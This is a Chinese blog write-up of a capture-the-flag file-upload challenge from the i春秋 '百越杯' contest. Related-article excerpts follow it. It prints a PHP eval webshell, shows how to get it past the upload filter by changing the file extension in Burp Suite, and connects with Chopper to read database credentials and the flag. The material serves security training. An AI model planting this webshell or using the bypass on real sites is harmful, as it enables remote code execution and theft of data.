i春秋-第三届“百越杯”福建省高校网络空间安全大赛

最新推荐文章于 2021-01-06 21:02:37 发布
最新推荐文章于 2021-01-06 21:02:37 发布
阅读量2.2k 收藏
点赞数 2
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44858189/article/details/107661191
版权

i春秋-第三届“百越杯”福建省高校网络空间安全大赛

记录一下i春秋里的一道web题,题目类型是文件上传漏洞

传送门:https://www.ichunqiu.com/battalion?t=1&r=61025

主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈

文件上传

来到上传点
在这里插入图片描述
先上传一个正常的.jpg文件(图片中写入一句话木马)

<?php eval($_POST['a']) ;?>

在这里插入图片描述

然后打开burp suite抓包,把后缀名jpg修改成php
在这里插入图片描述在这里插入图片描述
点击Forward发送数据包,成功上传并返回上传路径,当前目录下的upload/hi.php

在这里插入图片描述

利用菜刀连接数据库

密码:a
类型:php

在这里插入图片描述

连上后并没发现flag,但是在html文件夹里找到数据库配置文件

在这里插入图片描述在这里插入图片描述猜测flag在数据库里,用菜刀连接数据库
在连接webshell的地方右击数据库管理

在这里插入图片描述
然后再点击配置
在这里插入图片描述
填写刚才找到的数据库配置文件,格式为

<T>mysql</T> //数据库
<H>localhost</H> //数据库地址
<U>ctf</U> //账号
<P>ctfctfctf</P> //密码

在这里插入图片描述
连接成功,在ctf库中找到flag

在这里插入图片描述

Tru1
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
i春秋半月刊 - 安全技术资料汇总(共7份).zip
02-06
《i春秋半月刊 - 安全技术资料汇总》是一份集合了网络安全领域多个主题的压缩文件,包含了七份深入的技术资料。这些资料涵盖了从编程语言应用、代码审计、系统漏洞利用到移动安全等多个方面,旨在为网络安全从业者和...
福州大学计算机学院董晨老师,福州大学代表队高斩获第三届福建省高校网络空间安全大赛冠军...
weixin_42594419的博客
07-02 1097
新闻中心讯/10月27日,由福建省教育厅、福建省网络与信息安全协调小组办公室主办的“百越第三届福建省高校网络空间安全大赛在福州圆满落幕,福州大学三支代表队揽获本届大赛的冠军暨特等奖、二等奖和三等奖。本次省赛福州大学派出的代表队由数学与计算机科学学院学生组成,最终三支参赛队均获佳绩。其中,福州大学ROIS_A队(指导老师:何萧玲,参赛者:李剑涛(2015级信息安全专业本科生),王树民(2015级...
2018“百越”第四届福建省高校网络空间安全大赛题目writeup
You
12-02 5749
2018“百越”第四届福建省高校网络空间安全大赛writeup 0x00题目存档: 链接: https://pan.baidu.com/s/1v59VfheEC5XY8vyKvgEX3Q 提取码: bbfi 0x01题目名称:签到 操作内容: Step 0:题目信息 Step 1:九乘九矩阵加密析 莫名其妙就想到了矩阵加密,百度搜了半天的解密方法也没找到…还好队友做出来了,不然肯定会在这个题...
2018福建省百越”CTF初赛writeup
SWEET0SWAT的博客
12-03 4576
2018福建省百越”CTF初赛writeup PWN Boring Game 题目描述 nc 117.50.59.220 12345 解题经过下载下来后有两个文件pwn和libc.so.6。所以很明显是RET2LIBC的类型 检查文件安全性 程序源代码 int __cdecl main(int argc, const char **argv, const char **envp) { ...
第三届百越福建省高校网络空间安全大赛
andiao1218的博客
03-21 656
Upload: 选择jpg后缀的一句话木马,burp开启抓包,点击Submit上传 把jpg改为php,发包,在返回包里看到马的地址 用菜刀连接 这里有个ctf.sql,但是里面没有东西,flag可能在数据库里,打开config.php 得到数据库名称ctf,账号ctf,密码ctfctfctf 上大马 登陆mysql数据库 选择...
第三届百越福建省高校网络空间安全大赛要想会,先学会
lovelj的博客
01-06 2319
官方提示ping,直接搜索icmp ,毫无头绪 偶然发现按照时间排序后,lengt一列大小不一致,绞尽脑汁往flag{}靠,发现144-42=102,chr(102)=f,发现新大陆了,于是写了个脚本爆破(不好意思说是拿chr转换表找出来的) s = [144, 150, 139, 145, 165, 120, 139, 91, 160, 93, 167] flag = '' for i in s: flag += chr(i - 42) print(flag) #结果 fla..
2022年网络安全技能大赛国赛 PE逆向
05-13
2022年全国职业院校技能大赛网络安全国赛 PE逆向析 reverse
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
最新发布
04-30
### Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 #### 0x01 前言 在网络安全领域中,“自我跨站脚本攻击”(Self-XSS)通常被视为一个不起眼的安全问题。然而,在实际应用中,通过巧妙的设计和策略,Self-...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
i 春秋月刊 第 1 期到第 5 期
11-16
《i春秋月刊》系列是针对信息技术领域,特别是网络安全与编程技术的一套综合期刊,涵盖了从基础编程语言到高级安全话题的广泛内容。这五期的主题别为:Python应用、代码审计、SQL注入和XSS攻击,这些都是IT行业中...
i春秋练习——第三届百越福建省高校网络空间安全大赛-web-do you know upload
wuerror的博客
01-07 555
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?> burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。 显示上传成功 接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup
驻足
04-21 3828
推一波我的博客 Marsguest’s Blog 第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup 首先,直接上传一句话木马1.php文件 &lt;?php eval($_POST['cmd']);?&gt; //文件内容 发现如图弹窗 初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可 再次上传1.php的...
ctf-wp-第三届百越福建省高校网络空间安全大赛 Do you know upload?
key_nothing的博客
09-28 1291
考察:文件上传漏洞、数据库基本操作 访问url :只能上传图片文件 试着上传大马,burp抓包: 尝试修改文件类型为:image/jpeg 结果上传成功: 访问大马: 发现有个ctf.sql 。flag应该在数据库中,看看config.php,找到数据库连接方法: 执行一下sql语句:看看都有那些表 存在flag表,看看内容: bingo ...
第三届百越福建省高校网络空间安全大赛------------Do you know upload?
大方子
08-30 715
========================== 个人收获 1.通过修改文件类型绕过上传限制   ========================= 题目:   查看源码有一个提示信息 上传图片正常,上传其他的文件会出现 典型的上传绕过,这里就只需要把文件类型content-type字段改为image/gif(在上传其他文件的时候) 然后我们上传普通的php一句...
第三届百越福建省高校网络空间安全大赛 Do you know upload?
feng的博客
09-10 648
这是涉及文件上传和蚁剑连数据库的一个题目
第三届百越福建省高校网络空间安全大赛_Do you know upload?
a173262565的博客
04-09 259
题目在i春秋的ctf训练营 既然是上传,那就直接抓包 二话不说上来先给个00截断传个一句话助助兴 直接就成功了.... 赶紧操起菜刀去连接 进去之后发现ctf.sql是个空文件,那么flag应该在数据库中 查看config.php可以直接看到数据库账号密码 直接用菜刀连接,就能拿到flag了(一开始点开flag列并没有回显,后来自己修改了查询语句后才有...
第三届百越福建省高校网络空间安全大赛——WEB-Do you know upload?
Ifish的博客
04-07 1148
打开链接,发现是文件上传题,所以就先按正常套路来burpsuite抓包改文件类型上传成功菜刀连上以后在config文件中得到用户名和密码得到flag这道题有很多种做法,我就不一一列举了,总之是很基础的题了...
第三届百越福建省高校网络空间安全大赛writeup--Do you know upload?
weixin_30586257的博客
07-14 228
一打开网址,可以看出应该是文件上传漏洞,查看源码,也有可能是文件包含 上传个图片,成功,然后上传一句话木马 通过bp进行上传绕过 , 开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upload/2.php,密码为a 发现有ctf.sql,but打不开,所以用...
CTF-"第三届百越福建省高校网络空间安全大赛":Do you know upload?
路漫漫其修远
08-03 191
分值100 类型:Web题目名称:Do you know upload? 题目内容:https://www.ichunqiu.com/battalion?t=1&r=0 知识点 使用BurpSuite绕过上传文件格式校验 使用中国菜刀连接一句话???? 操作流程 打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许. 上传一句话.jpg,提交时使用Burpsuite...
i春秋CVE-2022-32991
08-12
<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* [【春秋云境】CVE-2022-32991靶场wp]...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值